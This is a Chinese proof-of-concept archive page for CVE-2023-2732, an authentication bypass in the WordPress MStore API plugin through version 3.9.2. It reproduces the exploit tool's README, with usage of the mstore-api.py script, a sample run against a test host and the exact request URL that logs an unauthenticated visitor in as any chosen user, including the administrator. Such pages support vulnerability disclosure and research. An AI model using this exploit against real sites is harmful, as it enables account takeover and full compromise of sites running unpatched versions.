支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: ac8cb4ae25a22335260385a981251ea511aa7ecd

来源
关联漏洞
标题:WordPress Plugin MStore API 安全漏洞 (CVE-2023-2732)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin MStore API 3.9.2及之前版本存在安全漏洞,该漏洞源于在通过插件添加列表 REST API 请求期间,对提供的用户的验证不充分,攻击者利用该漏洞可以可以以站点上任何现有用户(例如管理员)的身份登录。
Description
MStore API <= 3.9.2 - Authentication Bypass
介绍
# CVE-2023-2732


### MStore API &lt;= 3.9.2 - Authentication Bypass

[https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-392-authentication-bypass](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-392-authentication-bypass)


Description
---

```
The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

```




Help
----

```
usage: mstore-api.py [-h] -u URL

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  URL of the WordPress site
````

Example Usage
----

```
python3 mstore-api.py -u http://wordpress.lan


The plugin version is below 3.9.3.
Select a user:
1. admin
Enter the user ID: 1



Congratulations a vulnerable system has been found.

How to Exploit:

Visit the following url: http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
Visit  http://wordpress.lan and you should be logged in as the user you have chosen.
```
文件快照

[4.0K] /data/pocs/ac8cb4ae25a22335260385a981251ea511aa7ecd ├── [ 11K] LICENSE ├── [4.4K] mstore-api.py ├── [1.3K] README.md └── [ 15] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。